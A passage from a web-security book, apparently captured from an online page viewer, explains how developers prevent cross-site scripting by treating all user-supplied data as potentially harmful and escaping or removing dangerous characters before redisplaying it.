The most effective messages nowadays simply send potential victims
a link with no text at all. Their curiosity motivates them to click the link.
Preventing Cross-Site Scripting
To prevent XSS, developers must be very careful of user-supplied data that is served
back to users. We define user-supplied data as any data that comes from an outside network
connection to some web application. It could be a username submitted in an HTML form
at login, a backend AJAX request that was supposed to come from the JavaScript code
the developer programmed, an e-mail, or even HTTP headers. Treat all data entering a
web application from an outside network connection as potentially harmful.
For all user-supplied data that is later redisplayed back to users in all HTTP responses
such as web pages and AJAX responses (HTTP response code 200), page not found errors
(HTTP response code 404), server errors (like HTTP response code 502), redirects (like
HTTP response code 302), and so on, the developer must do one of the following:
??? Escape the data properly so it is not interpreted as HTML (to browsers) or XML
(to Flash).
??? Remove characters or strings that can be used maliciously.
Removing characters generally affects user experience.
Pages:
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132